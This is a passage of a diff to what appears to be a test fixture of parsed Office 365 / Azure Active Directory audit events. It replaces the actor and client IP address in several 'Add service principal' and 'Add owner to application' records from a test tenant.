},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17178,9 +17178,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { @@ -17400,7 +17400,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17430,9 +17430,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { @@ -17672,7 +17672,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17702,9 +17702,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { @@ -17944,7 +17944,7 @@ }, { "event": { - "original": 